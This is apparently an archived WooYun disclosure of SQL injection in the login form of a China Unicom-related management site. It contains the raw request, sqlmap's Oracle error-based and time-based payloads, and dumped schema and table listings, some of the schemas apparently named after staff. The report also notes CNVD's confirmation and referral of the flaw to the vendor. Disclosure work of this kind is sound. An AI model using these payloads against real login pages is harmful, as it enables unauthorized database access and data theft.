乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-14: 细节已通知厂商并且等待厂商处理中 2015-10-18: 厂商已经确认,细节仅向厂商公开 2015-10-28: 细节向核心白帽子及相关领域专家公开 2015-11-07: 细节向普通白帽子公开 2015-11-17: 细节向实习白帽子公开 2015-12-02: 细节向公众公开
POST /guanli/app/login.asp?action=login HTTP/1.1Host: **.**.**.**:8080User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**:8080/guanli/app/login.aspCookie: ASPSESSIONIDQQCSQBCR=KEPBHCDBMJDHKIBLDGJNHCEDConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 48user_name=123'&txtuserpwd=123&cmdfun=%B5%C7%C2%BD
参数:user_name
sqlmap resumed the following injection point(s) from stored session:---Parameter: user_name (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: user_name=123' AND 9700=CTXSYS.DRITHSX.SN(9700,(CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9700=9700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(106)||CHR(122)||CHR(113)))-- nrrl&txtuserpwd=123&cmdfun=%B5%C7%C2%BD Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: user_name=123' AND 3759=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- syfd&txtuserpwd=123&cmdfun=%B5%C7%C2%BD---web server operating system: Windows 8 or 2012web application technology: ASP.NET, ASP, Microsoft IIS 8.0back-end DBMS: Oraclecurrent schema (equivalent to database on Oracle): 'JT'sqlmap resumed the following injection point(s) from stored session:---Parameter: user_name (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: user_name=123' AND 9700=CTXSYS.DRITHSX.SN(9700,(CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9700=9700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(106)||CHR(122)||CHR(113)))-- nrrl&txtuserpwd=123&cmdfun=%B5%C7%C2%BD Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: user_name=123' AND 3759=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- syfd&txtuserpwd=123&cmdfun=%B5%C7%C2%BD---web server operating system: Windows 8 or 2012web application technology: ASP.NET, ASP, Microsoft IIS 8.0back-end DBMS: Oracleavailable databases [40]:[*] ACT3[*] APEX_030200[*] APPQOSSYS[*] BIS[*] CAOJP1[*] CEN[*] CHENZHENG8[*] CRM3[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] GRID[*] JT[*] LIHT32[*] LINING101[*] MDSYS[*] MENGDC1[*] NIUXD1[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] QINPENG2[*] REGN[*] REPORT[*] SCOTT[*] SHIYW11[*] SYS[*] SYSMAN[*] SYSTEM[*] TANGCG1[*] UN_LIKE[*] WANGFANG71[*] WMSYS[*] XDB[*] YANGLI44[*] ZHAOLJ36[*] ZHOUMM
sqlmap resumed the following injection point(s) from stored session:---Parameter: user_name (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: user_name=123' AND 9700=CTXSYS.DRITHSX.SN(9700,(CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9700=9700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(106)||CHR(122)||CHR(113)))-- nrrl&txtuserpwd=123&cmdfun=%B5%C7%C2%BD Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: user_name=123' AND 3759=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- syfd&txtuserpwd=123&cmdfun=%B5%C7%C2%BD---web server operating system: Windows 8 or 2012web application technology: ASP.NET, ASP, Microsoft IIS 8.0back-end DBMS: OracleDatabase: JT[232 tables]+-------------------------------+| ACCESSLOG || ACCT_DIS || ACCT_ONE_USER || ACC_DIS || ACTIVITIES_LIST || ACTIVITIES_TEAM || ACTIVITIES_TYPE || ASSESSMENT_SANWU || BM || BROADBAND_DEDICATED_LINE || BTBW_2014 || BTBW_2014_SJ || BULLETIN || CLUSTER_MARKET_ACTIVITY || CLUSTER_MARKET_ADDRESS || CLUSTER_MARKET_F_CBSS || DAILY_TV_LIST || DATA || DCHNDEVICE || DEDICATED_LINE || DEDICATED_LINE_CONVERT || DEL_1 || DEL_20 || DEL_3 || DEL_4 || DESTROY_3G_201401_06 || DISPATCH_PRODUCT || EXCEL_IMPORT || FUSION || FUSION_USER || FZDD_YYX || F_M_MOBILE_LIST || F_M_SUBSIDY || F_M_SUBSIDY_201506 || GAIZHI_RH || GROUP_4G || GZQD || GZQD_20150528 || GZ_CHANGE_REMARK || GZ_RESOURCES_SITUATION || HDPH_3GFZL || HDPH_JH || HDPH_JH_2013_1JD || HDPH_YWLB || HMQD || HMQD_20150528 || IMEI || INDUSTRY_AGENT || INTMP || IP || JBDA || JBDA_FZBM || JBDA_FZBM_YYX || JBDA_ZW || JF_DLK || JF_DLK_2014 || JF_JWT || JF_XLLK || JF_YSQD || JF_ZSHQD || JINING_HBY || JINING_HBYBAK || JKZX3G || JKZX3GQF || JURISDICTION || KHGL_LNLC || KHGL_YWXX || KHQD || KHQD_20140113 || KHQD_20140227 || KHQD_20140429 || KHQD_20140520 || KHQD_20140524 || KHQD_20140616 || KHQD_ACCOUNT_ID || KHQD_ACCOUNT_ID_20140312 || KHQD_ACCOUNT_ID_20140428 || KHQD_ACCOUNT_ID_20140524 || KHQD_ACCOUNT_ID_BAK || KHQD_ADJUST_LOG || KHQD_HYDLK || KHQD_SERVICESTATE || LEDGER || LINE_NUM || LINQING_QF || LSAJIE_JTKHZGID || LSAJIE_TEMP || LTZWQD || MAINTAIN_INFO || MAINTAIN_USER || MAINTAIN_USER_4G || NET_TYPE || NOTES || NUMCHANGE || ODBC_IMPORT || PHONE1 || PON_JT_21 || PON_TMP || PON_TMP1 || PON_TMP_21 || PRODUCT_VALUE || PROTOCOL_PAYMENT || PU_NAMES || QFQD || QFQD_201310 || QFQD_ACCOUNT_ID || QFQD_RECOVER || REAL_NAME || REGIONBUILDINGPORT07 || REPORT_TRADE_IPTV || RSS_REGIONBUILDINGPORT07 || RT_ADDRESS_INFO07 || SRBB_201302_XFZ || SRBB_201303 || SRBB_201303_XFZ || SRBB_201304 || SRBB_201304_XFZ || SRBB_201305 || SRBB_201305_XFZ || SRBB_201306 || SRBB_201306_XFZ || SRBB_201307 || SRBB_201307_XFZ || SRBB_201308 || SRBB_201308_XFZ || SRBB_201309 || SRBB_201309_XFZ || SRBB_201310 || SRBB_201310_XFZ || SRBB_201311 || SRBB_201311_XFZ || SRBB_201312 || SRBB_201312_XFZ || SRBB_201401 || SRBB_201401_XFZ || SRBB_201402 || SRBB_201402_XFZ || SRBB_201403 || SRBB_201403_XFZ || SRBB_201404 || SRBB_201404_XFZ || SRBB_201405 || SRBB_201405_XFZ || SRBB_201406 || SRBB_201406_XFZ || SRBB_201407 || SRBB_201407_XFZ || SRBB_201408 || SRBB_201409_XFZ || SRBB_201410 || SRBB_201410_XFZ || SRBB_201411_XFZ || SRBB_201412 || SRBB_201502 || SRBB_201503 || SRBB_201507 || SRBB_201509 || SRBB_BUMEN || SRBB_BUMEN_ACCOUNT_ID || SRBB_BUMEN_ELIMINATE_MAINTAIN || SRBB_DANWEI || SRBB_DANWEI_ACCOUNT_ID || SRBB_KHJL || SRBB_KHJL_ACCOUNT_ID || SYSTEM_BINDING || SYSTEM_CODE_STATIC || TEMP_ACCOUNT_ID || TEMP_CUST || TEMP_CUST1 || TEMP_DWDB || TEMP_DWDBQF || TEMP_JIHONGYING_VPN || TEMP_LIRUHUI || TF_BH_TRADE || TF_F_RELATION_GROUP || TF_F_RELATION_UU || TMP_DBQF || TMP_HMQD || TMP_HTH || TMP_YF || TMP_YF_CBSS || TM_DEVELOP || TM_KEEP_201312 || TM_KEEP_201412 || TM_USER || TM_USER_2013 || TM_USER_CUST || TM_USER_ITEM || TM_USER_KHQD || TM_USER_T_HEYUE || T_1 || T_2 || T_HEYUE || T_HEYUE_201508 || T_HEYUE_20150818 || T_HEYUE_4G || T_HEYUE_CUNLIANG || T_HEYUE_DANWEI || T_HEYUE_DWDB || T_HEYUE_DWDB_QFDD || T_HEYUE_DWDB_QTDD || T_HEYUE_DWDB_SGS || T_HEYUE_DWDB_SGS1 || T_HEYUE_GLHT || T_HEYUE_QFQD || T_HEYUE_QFQD_20131130 || T_HEYUE_QFQD_20140305 || T_HEYUE_SGS || T_HEYUE_SHOURU_201310 || T_HEYUE_SHOURU_201311 || T_HEYUE_SHOURU_201312 || T_HEYUE_SHOURU_201401 || T_HEYUE_SHOURU_201402 || T_HEYUE_SHOURU_201403 || T_HEYUE_ZDDD || UPDATE_M_T_ACCOUNT_ID || USER_ID || USER_SCALE || VPN_USER_MOBILE || WHT_DWDB || WHT_DWDB_20140703 || WUYONGHENG_3G || WYH_GWLS || WYH_GWLW || XLTZWMBQD || XLTZWMBQD_BB || XZQH || ZDGL_COLOR || ZDGL_IN || ZDGL_SORT || ZDGL_XH || ZDGL_YSJ |+-------------------------------+
表太多,之跑了一部分。
危害等级:中
漏洞Rank:9
确认时间:2015-10-18 22:37
CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置.
暂无
